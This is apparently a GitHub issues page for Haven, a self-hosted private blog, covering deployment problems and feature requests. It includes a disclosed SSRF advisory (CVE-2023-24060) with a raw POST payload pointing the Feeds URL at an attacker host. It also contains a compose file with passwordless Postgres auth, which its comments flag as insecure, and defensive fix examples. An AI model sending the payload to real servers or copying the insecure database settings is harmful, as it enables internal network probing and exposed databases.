havenweb / haven
Self-hostable private blogging
Home Page: https://havenweb.org
License: MIT License
[DEPRECATED] The `--deployment` flag is deprecated because it relies on being remembered across bundler invocations, which bundler will no longer do in future versions. Instead please use `bundle config set --local deployment 'true'`, and stop using this flag
[DEPRECATED] The `--without` flag is deprecated because it relies on being remembered across bundler invocations, which bundler will no longer do in future versions. Instead please use `bundle config set --local without 'development test'`, and stop using this flag
Check various deployment scripts, ensure we're using the correct setting.
Hey there!
I belong to an open source security research community, and a member (@vanlan12) has found an issue, but doesn’t know the best way to disclose it.
If not a hassle, might you kindly add a SECURITY.md file with an email, or another contact method? GitHub recommends this best practice to ensure security issues are responsibly disclosed, and it would serve as a simple instruction for security researchers in the future.
Thank you for your consideration, and I look forward to hearing from you!
(cc @huntr-helper)
There are a few configuration options on nginx (and I'm certain a few other proxies as well) that need to be set up, due to the redirects that the application is performing. Would a few lines of "maybe you need these options on nginx" fit in?
This is a suggestion and not related to the code. By adding tags, other people could also find this project by topic. (BTW I found this via HN.)
For the tags, I suggest the following (obvious) tags:
Right now, there is no seed data, which makes developing just a bit more difficult, since a user needs to be created before you can log in. There should be some seed data to make development a little bit easier.
The db/seeds.rb file can be used to accommodate this.
Hi,
I'm getting the following when running the docker compose file:
[haven 7/13] RUN APT update:
0.345 /bin/sh: 1: APT: not found
failed to solve: process "/bin/sh -c APT update" did not complete successfully: exit code: 127
This is after 2-3 minutes of building; then this error appears and it stops.
Is this a known issue or something someone has seen before? Thanks!
There seems to be quite a lack of tests. Increasing the test coverage not only increases developer confidence when building new stuff (the old stuff will not break), but it also documents the expected behaviour.
By default it uses Minitest, but we could make the argument that RSpec is also a fine choice, because it is arguably more readable.
Started through docker compose (see below) and after first login it was a 500 error.
Reading the production.log (inside the container), it was missing @setting, so I ran Setting.create and it worked.
version: '3.7'
services:
  haven:
    container_name: 'haven-blog'
    image: ghcr.io/havenweb/haven:22dc990
    depends_on:
      - postgresql
    ports:
      - "5030:3000"
    volumes:
      # Bind mount; the named volume "haven_storage" declared at the bottom is not used.
      - $BASE_FOLDER_DOCKER/haven_storage:/storage
    environment:
      - RAILS_ENV=production
      - HAVEN_DB_HOST=postgresql
      - HAVEN_DB_NAME=haven
      - HAVEN_DB_ROLE=haven
      - HAVEN_DB_PASSWORD=$HAVEN_DB_PASSWORD
      - HAVEN_USER_EMAIL=$HAVEN_USER_EMAIL
      - HAVEN_USER_PASS=$HAVEN_USER_PASS
  postgresql:
    image: postgres:13.2-alpine
    ports:
      # Publishes Postgres on every host interface, not only to the haven container.
      - "5432:5432"
    # https://www.postgresql.org/docs/current/static/non-durability.html
    # fsync/synchronous_commit off trade crash safety for speed.
    command: [
      "postgres",
      "-c", "max_connections=1000",
      "-c", "synchronous_commit=off",
      "-c", "fsync=off",
      "-c", "full_page_writes=off",
      "-c", "max_wal_size=4GB",
      "-c", "checkpoint_timeout=30min",
      "-c", "wal_level=logical"
    ]
    environment:
      # "trust" disables password authentication for every client that can reach port 5432;
      # HAVEN_DB_PASSWORD above is therefore not enforced by the server.
      POSTGRES_HOST_AUTH_METHOD: trust
      POSTGRES_USER: haven
    volumes:
      # Bind mount; the named volume "postgresqldata" declared at the bottom is not used.
      - $BASE_FOLDER_DOCKER/postgresqldata:/var/lib/postgresql/data
volumes:
  postgresqldata:
    external: false
  haven_storage:
    external: false
How to deploy this on own server? Not on AWS, not on a Pi, just on a regular Linux VM. Thanks!
It would be great to be able to customize the favicon by uploading a new image.
When viewing on mobile, the links are stacking instead of converting to a hamburger menu. It's a bit cluttered in the header due to this.
Using an iPhone 12 Pro Max.
A Security Advisory has been raised for Haven v5d15944 (CVE-2023-24060):
Description:
Haven v5d15944 allows Server-Side Request Forgery (SSRF) via the Feeds functionality.
Malicious authenticated users with the ability to create or add RSS Feeds to the website can supply an arbitrary host such as the host itself in an attempt to scan the internal network.
Affected URL (Parameter):
http://localhost:3000/feeds (url)
Suggested Fix:
Consider performing this action on the client-side. There's no need for the server to fetch the RSS feed, have the user's browser fetch the latest feed when loading the page. This would also remove the need to have a script that will execute every so often to update the RSS feed.
Reference:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24060
https://nvd.nist.gov/vuln/detail/CVE-2023-24060
https://owasp.org/www-community/attacks/Server_Side_Request_Forgery
https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html
Payload:
POST /feeds HTTP/1.1
Host: localhost:3000
Content-Length: 203
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
Cookie: _blog_session=[]
Connection: close
utf8=%E2%9C%93&authenticity_token=[]&feed%5Burl%5D=https%3A%2F%2Fattacker.com%2Frss&commit=Add+Feed
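The advisory above suggests moving the fetch to the browser. If the server keeps fetching feeds (so that the periodic updater still works), the standard server-side control is to vet the destination before connecting: allow only http(s), resolve the hostname, and refuse any answer that lands in loopback, private, link-local or IPv4-mapped space, then connect to the vetted address rather than re-resolving the name. The following is an added example of that check in Ruby, the language Haven is written in; it is not Haven's code or the reporter's suggested fix. The `vet_feed_url` and `safe_feed_url?` names, the injectable `resolver` and the port allowlist are assumptions made for the example.

```ruby
require "uri"
require "ipaddr"
require "resolv"

# Added example (not Haven's code): vet a user-supplied feed URL before the
# server fetches it. Assumes the caller then connects to the returned IP
# address (not the hostname) so DNS rebinding cannot undo the check.

class UnsafeFeedUrl < StandardError; end

# Address space a feed fetcher has no business reaching: "this network",
# RFC 1918, CGNAT, loopback, link-local (which includes the 169.254.169.254
# cloud metadata endpoint) and the IPv6 unspecified/loopback/ULA/link-local
# ranges. Assumed policy for the example; extend as needed.
BLOCKED_RANGES = %w[
  0.0.0.0/8 10.0.0.0/8 100.64.0.0/10 127.0.0.0/8 169.254.0.0/16
  172.16.0.0/12 192.168.0.0/16 ::/128 ::1/128 fc00::/7 fe80::/10
].map { |cidr| IPAddr.new(cidr) }.freeze

ALLOWED_SCHEMES = %w[http https].freeze
ALLOWED_PORTS   = [80, 443].freeze   # assumed policy: stops internal port scanning

# Returns [uri, ip] for a URL that is safe to fetch, or raises UnsafeFeedUrl.
# `resolver` is injectable so the logic can be exercised offline; the default
# is the system resolver.
def vet_feed_url(url, resolver: ->(host) { Resolv.getaddresses(host) })
  uri = begin
    URI.parse(url.to_s.strip)
  rescue URI::InvalidURIError
    raise UnsafeFeedUrl, "unparseable URL"
  end
  raise UnsafeFeedUrl, "scheme must be http or https" unless ALLOWED_SCHEMES.include?(uri.scheme)
  raise UnsafeFeedUrl, "missing host" if uri.hostname.nil? || uri.hostname.empty?
  raise UnsafeFeedUrl, "credentials in URL not allowed" if uri.userinfo
  raise UnsafeFeedUrl, "port #{uri.port} not allowed" unless ALLOWED_PORTS.include?(uri.port)

  # Literal IPs are checked directly. IPAddr is strict, so shorthand forms such
  # as "2130706433" or "0x7f.1" are not accepted as IPs and go to DNS instead.
  addresses = begin
    [IPAddr.new(uri.hostname)]
  rescue IPAddr::InvalidAddressError
    resolver.call(uri.hostname).map { |a| IPAddr.new(a) }
  end
  raise UnsafeFeedUrl, "host does not resolve" if addresses.empty?

  # Every answer must be public: a name that resolves to one public and one
  # internal address (round-robin / rebinding setups) is rejected as a whole.
  addresses.each do |addr|
    addr = addr.native if addr.ipv4_mapped?   # ::ffff:10.0.0.5 -> 10.0.0.5
    if BLOCKED_RANGES.any? { |range| range.include?(addr) }
      raise UnsafeFeedUrl, "#{addr} is in a blocked address range"
    end
  end

  [uri, addresses.first]
end

# Convenience predicate for a model validation or controller check.
def safe_feed_url?(url, resolver: ->(host) { Resolv.getaddresses(host) })
  vet_feed_url(url, resolver: resolver)
  true
rescue UnsafeFeedUrl
  false
end
```

Two things the check alone does not cover: the fetcher must open the connection to the returned IP (sending the hostname in the Host header and SNI), and it must not follow redirects automatically; each redirect target goes through `vet_feed_url` again. The same function has to run in the background updater, not only on the form submission, since the stored URL is what gets fetched later.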
Hello, good day. I am trying to get Haven to work with the deploy-pi.sh script; however, I have some doubts. I have my own reverse proxy to expose the server to the internet. Which part of the script would I have to delete for everything to work OK? I tried removing the parts:
## HTTPS with Letsencrypt
#Rewrite Apache config to fix http -> https redirect
However, I get a "server not available" error. Could you guide me a little? Thanks.
Right now, the options for Password are:
This is confusing.
Either the "Change Password" screen should be a sub-menu (different page), or it should at least have its own header, with its own save button:
save changes
update password
delete account
[custom css to make it red, probably]
I'll update if I find more. If I end up using the site, I may open a PR for some of the above.
I believe the project could greatly benefit from Docker (and compose) support. Making it easier to setup on machines that are not single purpose (like a raspberry pi or AWS instances) can be greatly beneficial in getting a greater adoption for Haven.
We can start with a rough base and refine from there.
It's not specifically stated if this is a goal at all, but is there a way to make posts globally visible? Meaning you don't need a password to see them.
For example:
blog.domain.com/public
When on HTTPS (certificate through certbot), using Apache as a reverse proxy, and making some edits such as:
I got this error:
HTTP Origin header (https://blog.<my website obscured name>.com) didn't match request.base_url (http://blog.<my website obscured name>.it)
Do I have to force HTTP instead of HTTPS?
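The error above is Rails's CSRF origin check: behind a TLS-terminating proxy the application only ever sees a plain-HTTP connection, so request.base_url is built as http:// and no longer matches the https:// Origin the browser sends. Forcing HTTP is the wrong direction; the proxy has to pass the original scheme and Host through. Below is an added example of a minimal Apache vhost that does this (it is not Haven's deploy-pi.sh and not the reporter's configuration); the hostname, certificate paths and backend port 3000 are assumptions. The same two settings answer the nginx request earlier on this page: `proxy_set_header Host $host;` and `proxy_set_header X-Forwarded-Proto $scheme;` in the location block that proxies to the app.

```apache
# Requires mod_ssl, mod_proxy, mod_proxy_http and mod_headers.
<VirtualHost *:443>
    ServerName blog.example.com

    SSLEngine on
    SSLCertificateFile    /etc/letsencrypt/live/blog.example.com/fullchain.pem
    SSLCertificateKeyFile /etc/letsencrypt/live/blog.example.com/privkey.pem

    # Pass the browser's Host header through, so request.base_url carries the
    # public hostname instead of 127.0.0.1:3000.
    ProxyPreserveHost On

    # Tell Rails the client connection was TLS. "set" overwrites any value a
    # client may have sent, so the header cannot be spoofed from outside.
    RequestHeader set X-Forwarded-Proto "https"

    ProxyPass        / http://127.0.0.1:3000/
    ProxyPassReverse / http://127.0.0.1:3000/
</VirtualHost>

<VirtualHost *:80>
    ServerName blog.example.com
    Redirect permanent / https://blog.example.com/
</VirtualHost>
```

With X-Forwarded-Proto set, Rack reports the scheme as https, request.base_url becomes https://blog.example.com, and the Origin comparison passes; the proxy should be the only thing able to reach port 3000 so that nobody can bypass it and send their own forwarded headers.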
Hi, there's been some pretty great strides in support for IndieAuth Ticket Auth which is a simple mechanism for publishers to provide a bearer authentication token to clients (such as feed readers), which is significantly more secure than private per-user feeds. Are there any plans to support that on the reader and/or publisher side of Haven?
Getting more widespread adoption of this mechanism would be great.
Hello! I'm starting to use Haven finally (we had talked over email before!) and after a pause in using it, and having changed my password, I got locked out. I have no idea how to get the password back (sadly my password manager didn't catch that I changed it) and was wondering if a possible feature to have an email reset the password would be able to be included?
I also was wondering if it would be possible to make the CSS editing a bit easier. I know some CSS/HTML, but I couldn't find an easy guide on how to start editing it as far as CSS classes and such. I know I can inspect element in my browser, but it might be worthwhile to either make note of some tips on styling it, or something along those lines? Especially for people who might not be quite as knowledgeable. If there is a guide somewhere, I apologize! I'm bad at finding things sometimes.
Thank you for your time and I really like the project!
Apologies for any inconvenience caused; posted erroneously.
Do you plan on adding contribution guidelines? I would love to help out where possible if there's a need and/or desire for contributions. If not, no worries. Just wanted to get the conversation going if there's one to be had.
It would be nice if Haven supported RTL languages. This means that when you write in these languages, the text appears from right to left instead of from left to right.